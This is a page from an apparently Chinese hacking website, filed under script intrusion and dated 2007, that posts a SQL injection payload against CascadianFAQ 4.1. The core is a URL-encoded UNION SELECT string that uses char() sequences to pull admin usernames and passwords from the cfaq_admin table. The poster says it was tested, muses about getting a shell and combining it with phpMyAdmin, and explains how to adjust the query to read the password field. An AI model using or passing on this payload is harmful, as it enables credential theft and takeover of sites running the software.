黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 文章正文
[推荐]CascadianFAQ 4.1 Sql Injecton 漏洞
        ★★★★★
CascadianFAQ 4.1 Sql Injecton 漏洞
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-2-5
测试过了 效果还行 不过不知道杂拿SHELL

后台好简陋喔...不过要是运气好能和phpmyadmin配合估计有戏看

发现这个注入方法挺新颖的~

union%20select%20concat(char(85),char(115),char(101),char(114),char(11
0),char(97),char(109),char(101),char(58),username,char(32),char(124),char(124),char(32),char(
80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),password),2
%20from%20cfaq_admin%20where%20accesslevel%20like%201/*

union select concat(自己构造在页面上的东东)

例如: 

以上的char....就是username:表名(username)||password=:表名(password)

因为上面的那个显示栏目的地方有字符显示限制所以password没看到

可以把username那里改成password表名 就能读取到密码了~

嘿嘿~继续研究下
文章录入:cainiaowang    责任编辑:cainiaowang 
【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
VIP 专 区
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886